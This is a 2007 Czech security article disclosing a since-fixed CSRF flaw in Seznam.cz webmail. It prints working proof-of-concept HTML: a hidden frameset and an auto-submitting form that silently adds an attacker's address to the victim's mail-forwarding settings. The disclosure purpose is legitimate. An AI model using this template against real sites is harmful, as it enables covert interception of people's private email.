Zpět na seznam článků     Číst komentáře (55)     Verze pro tisk

Uživatelé SEZNAM.CZ v ohrožení

Autor: .cCuMiNn.   
13.2.2007

Máte svůj e-mailový účet veden na Seznam.cz a máte pocit bezpečí? Možná se po přečtení tohoto článku už tak bezpečně cítit nebudete :)


Seznam.cz hacked

Zranitelnosti Cross-Site Request Forgery (CSRF) na webu jsou velice choulostivou záležitostí, jejíž hrozbu si tvůrci webových aplikací buď nepřipouští nebo o ní nedej bože nevědí a tak můžete zranitelnost tohoto typu nalézt na mnoha webových stránkách. Napadlo mě prověřit si zabezpečení našeho největšího a nejznámějšího poskytovatele freemailových účtů společnost Seznam.cz. K mému údivu trpí webové rozhraní pro přístup k e-mailovým zprávám naprosto banální chybou, díky níž si uživatelé této služby nemohou být v žádném případě jisti svým soukromím. V krátkosti se vás nyní pokusím seznámit s touto konkrétní chybou, kterou jsem na Seznam.cz objevil.

Chyba se nachází v sekci nastavení účtu, kde si můžete zřídit přesměrování příchozích e-mailů do jiné e-mailové schránky. Útočníkovi stačí, když své oběti zašle e-mail s odkazem na www stránku, kde bude čekat zákeřný kód. Po kliknutí na takový odkaz se kód sám postará o vložení e-mailové adresy do tohoto seznamu.

Kód čekající na útočníkově stránce by mohl vypadat takto:

  1. <html>
  2.   <body>
  3.     <frameset cols="0, *">
  4.     <frame src="http://www.utocnik.cz/seznam.html">
  5.     <frame src="http://www.soom.cz"></frameset>
  6.   <body>
  7. </html>

A zdrojový kód stránky seznam.html by mohl být takovýto:

  1. <html>
  2.   <body>
  3.     <form name="fakeform" action="http://email.seznam.cz/forwardProcess" method="post">
  4.       <input type="hidden" name="sessionId" value="">
  5.       <input type="hidden" name="filterId" value="-1">
  6.       <input type="hidden" name="actionType" value="">
  7.       <input type="hidden" name="actionValue1" value="fake@domena.cz">
  8.     </form>
  9.     <script type="text/javascript">document.fakeform.submit();</script>
  10.   </body>
  11. </html>

Oběti se po kliknutí na odkaz zobrazí stránka www.soom.cz, která jí byla odesilatelem e-mailu doporučena. Na pozadí však útočník naprosto nepozorovaně vložil svou adresu do nastavení účtu oběti a veškerá příchozí pošta, která od této chvíle oběti přijde, bude přeposílána na útočníkův e-mail.

Co mě zarazilo u tak velké a známé společnosti, jakou Seznam.cz bezpochyby je, byla skutečnost, že před tímto typem útoku chyběla jakákoliv ochrana a že aplikace přijímá požadavky přicházející odkudkoli.

Ve stejnou chvíli, kdy uveřejňuji tento článek, zasílám oznámení o chybě i administrátorům společnosti Seznam.cz a jsem zvědav, jak dlouho jim bude náprava trvat.


Druhý den po odhalení chyby byly ze strany společnosti Seznam.cz učiněny kroky, směřující k opravě popsané chyby. Dnes již není možné touto cestou ohrozit soukromí uživatelů, za což lidem ze Seznam.cz děkujeme.


Líbil se Vám článek?
Budeme potěšeni, pokud vás zaujme také reklamní nabídka

Social Bookmarking

     





Hodnocení/Hlasovalo: 2.14/523

1  2  3  4  5    
(známkování jako ve škole)